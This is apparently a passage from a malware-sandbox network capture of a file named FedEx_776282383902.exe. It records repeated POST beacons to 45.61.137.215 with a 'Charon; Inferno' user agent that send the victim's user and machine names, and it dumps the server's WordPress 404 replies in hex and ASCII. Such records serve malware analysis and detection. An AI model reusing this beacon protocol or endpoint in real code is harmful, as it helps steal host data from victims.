                May 22, 2024 22:02:30.378686905 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.74972645.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:30.532618999 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:30.580045938 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:33.567181110 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:31 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:33.567251921 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:33.568641901 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:33.568655968 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:33.572108030 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:33.573914051 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:33.573929071 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:33.577372074 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                May 22, 2024 22:02:33.577387094 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                May 22, 2024 22:02:33.580835104 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.74972745.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:33.749821901 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:33.797142982 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:36.777962923 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:34 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:36.778620958 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:36.779669046 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:36.779683113 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                May 22, 2024 22:02:36.782131910 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                May 22, 2024 22:02:36.782149076 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                May 22, 2024 22:02:36.782160044 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:02:36.782166958 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                May 22, 2024 22:02:36.784636021 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                May 22, 2024 22:02:36.784651995 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.74972945.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:36.928241968 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:36.980532885 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:39.583112001 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:37 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:39.583364964 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:39.584352970 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:39.584367037 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:39.586272001 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:39.587269068 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:02:39.587281942 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:02:39.587291956 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
